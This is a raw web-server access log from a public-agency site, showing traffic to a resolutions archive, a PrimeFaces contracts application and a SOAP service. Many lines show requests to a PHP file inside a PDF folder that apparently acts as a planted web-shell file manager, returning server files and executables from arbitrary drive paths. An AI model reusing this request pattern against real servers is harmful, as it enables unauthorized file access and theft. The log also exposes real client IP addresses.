201.245.192.253 - - [16/Jun/2024:15:13:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.130 - - [16/Jun/2024:15:13:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1732.pdf&ft=img&white=1 HTTP/1.1" 200 179983
216.245.221.92 - - [16/Jun/2024:15:13:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:15:13:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0025.pdf HTTP/1.1" 200 306981
47.128.43.83 - - [16/Jun/2024:15:14:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Canti%5C&f=menu.php&ft=download HTTP/1.1" 200 3850
216.244.66.195 - - [16/Jun/2024:15:14:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0332.pdf HTTP/1.1" 200 481499
201.245.192.253 - - [16/Jun/2024:15:14:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:15:14:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0661.pdf HTTP/1.1" 200 322768
47.128.25.158 - - [16/Jun/2024:15:14:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page64.swf&ft=img&white=1 HTTP/1.1" 200 20209
216.244.66.195 - - [16/Jun/2024:15:15:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1374.pdf HTTP/1.1" 200 278246
201.245.192.253 - - [16/Jun/2024:15:15:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.116.93 - - [16/Jun/2024:15:15:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=tags-box.min.js&ft=notepad&white=1 HTTP/1.1" 200 2721
216.244.66.195 - - [16/Jun/2024:15:15:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1676.pdf HTTP/1.1" 200 283826
161.18.222.72 - - [16/Jun/2024:15:15:51 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 2905
161.18.222.72 - - [16/Jun/2024:15:15:55 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 123459
161.18.222.72 - - [16/Jun/2024:15:15:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:15:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:15:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:15:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:15:56 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
216.244.66.195 - - [16/Jun/2024:15:15:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1908.pdf HTTP/1.1" 200 295523
161.18.222.72 - - [16/Jun/2024:15:16:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36360
161.18.222.72 - - [16/Jun/2024:15:16:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
161.18.222.72 - - [16/Jun/2024:15:16:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5729
201.245.192.253 - - [16/Jun/2024:15:16:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.56.133 - - [16/Jun/2024:15:16:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailtodisk&f=mailtodisk.exe HTTP/1.1" 200 1007264
161.18.222.72 - - [16/Jun/2024:15:16:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 120473
161.18.222.72 - - [16/Jun/2024:15:16:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:09 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:09 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:10 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:16:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 166607
201.245.192.253 - - [16/Jun/2024:15:16:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:15:16:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2479.pdf HTTP/1.1" 200 325928
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 39331
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
161.18.222.72 - - [16/Jun/2024:15:16:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
161.18.222.72 - - [16/Jun/2024:15:16:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
161.18.222.72 - - [16/Jun/2024:15:16:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2869
161.18.222.72 - - [16/Jun/2024:15:16:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2861
161.18.222.72 - - [16/Jun/2024:15:16:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5729
161.18.222.72 - - [16/Jun/2024:15:16:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 120473
161.18.222.72 - - [16/Jun/2024:15:16:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:44 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
216.244.66.195 - - [16/Jun/2024:15:16:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2604.pdf HTTP/1.1" 200 282865
161.18.222.72 - - [16/Jun/2024:15:16:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 166607
47.128.114.27 - - [16/Jun/2024:15:16:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=wp-pointer.min.js&ft=download&white=1 HTTP/1.1" 200 3639
172.22.2.4 - - [16/Jun/2024:15:15:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.222.72 - - [16/Jun/2024:15:16:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 42059
161.18.222.72 - - [16/Jun/2024:15:16:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:16:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:15:16:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36422
201.245.192.253 - - [16/Jun/2024:15:16:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34556
161.18.222.72 - - [16/Jun/2024:15:17:06 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5331
216.244.66.195 - - [16/Jun/2024:15:17:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2608.pdf HTTP/1.1" 200 2843913
161.18.222.72 - - [16/Jun/2024:15:17:20 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5415
201.245.192.253 - - [16/Jun/2024:15:17:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:15:17:29 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5484
47.128.114.226 - - [16/Jun/2024:15:17:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page59.swf&ft=download HTTP/1.1" 200 37319
172.22.2.4 - - [16/Jun/2024:15:16:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.244.66.195 - - [16/Jun/2024:15:17:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2624.pdf HTTP/1.1" 200 509612
47.128.42.154 - - [16/Jun/2024:15:18:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2680.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [16/Jun/2024:15:18:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:15:18:27 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:15:18:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2737.pdf HTTP/1.1" 200 393726
47.128.123.154 - - [16/Jun/2024:15:18:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=mercuryi.dll&ft=img&white=1 HTTP/1.1" 200 217088
216.244.66.195 - - [16/Jun/2024:15:19:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1542.pdf HTTP/1.1" 200 72655
201.245.192.253 - - [16/Jun/2024:15:19:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.54.192 - - [16/Jun/2024:15:19:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccalculadora%5Cvendor%5Cbootstrap%5Cjs&f=popper.js&ft=download HTTP/1.1" 200 81670
216.244.66.195 - - [16/Jun/2024:15:19:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1963.pdf HTTP/1.1" 200 268374
201.245.192.253 - - [16/Jun/2024:15:18:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [16/Jun/2024:15:19:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34556
216.244.66.195 - - [16/Jun/2024:15:20:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0429.pdf HTTP/1.1" 200 287755
161.18.222.72 - - [16/Jun/2024:15:20:17 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 2897
161.18.222.72 - - [16/Jun/2024:15:20:18 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
47.128.16.196 - - [16/Jun/2024:15:20:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1487.pdf&ft=notepad&white=1 HTTP/1.1" 200 351945
201.245.192.253 - - [16/Jun/2024:15:20:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
161.18.222.72 - - [16/Jun/2024:15:20:24 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 123619
161.18.222.72 - - [16/Jun/2024:15:20:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:24 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:20:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 36285
161.18.222.72 - - [16/Jun/2024:15:20:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:29 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:29 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
172.22.2.4 - - [16/Jun/2024:15:20:30 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%201%20del%205%20de%20Abril%20de%202011.pdf HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:20:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 32403
216.244.66.195 - - [16/Jun/2024:15:20:36 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2016%2F HTTP/1.1" 200 172673
161.18.222.72 - - [16/Jun/2024:15:20:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 44961
161.18.222.72 - - [16/Jun/2024:15:20:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33099
161.18.222.72 - - [16/Jun/2024:15:20:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33102
47.128.123.111 - - [16/Jun/2024:15:20:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3378.pdf&ft=img&white=1 HTTP/1.1" 200 388879
161.18.222.72 - - [16/Jun/2024:15:21:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5763
161.18.222.72 - - [16/Jun/2024:15:21:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 119924
161.18.222.72 - - [16/Jun/2024:15:21:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:21:04 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:21:04 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:21:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:21:04 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
161.18.222.72 - - [16/Jun/2024:15:21:07 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 181623
201.245.192.253 - - [16/Jun/2024:15:21:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:15:21:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
150.109.16.20 - - [16/Jun/2024:15:21:39 -0500] "GET / HTTP/1.1" 200 319
47.128.124.92 - - [16/Jun/2024:15:21:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5878.pdf&ft=notepad&white=1 HTTP/1.1" 200 392905
161.18.222.72 - - [16/Jun/2024:15:22:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 41298
161.18.222.72 - - [16/Jun/2024:15:22:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:22:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:22:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.222.72 - - [16/Jun/2024:15:22:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:15:22:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.228 - - [16/Jun/2024:15:22:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0501.pdf&ft=notepad&white=1 HTTP/1.1" 200 835273
172.22.2.4 - - [16/Jun/2024:15:21:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.222.72 - - [16/Jun/2024:15:22:42 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5322
161.18.222.72 - - [16/Jun/2024:15:22:46 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 5415
201.245.192.253 - - [16/Jun/2024:15:23:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:15:23:27 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:15:21:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.97.197 - - [16/Jun/2024:15:23:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=00001611.tif HTTP/1.1" 200 2743
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 42247
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35555
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35555
186.154.121.126 - - [16/Jun/2024:15:23:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35555
186.154.121.126 - - [16/Jun/2024:15:23:52 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35555
186.154.121.126 - - [16/Jun/2024:15:23:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12884
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 137492
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.154.121.126 - - [16/Jun/2024:15:23:57 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
186.154.121.126 - - [16/Jun/2024:15:24:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 8037735
201.245.192.253 - - [16/Jun/2024:15:24:22 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.45.147 - - [16/Jun/2024:15:24:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=resoluciones%2812%29.csv HTTP/1.1" 200 2751
161.18.222.72 - - [16/Jun/2024:15:24:55 -0500] "POST /sipse/faces/presentacion/financiero/modificacionContrato/cargarModifiacion.xhtml HTTP/1.1" 200 2905
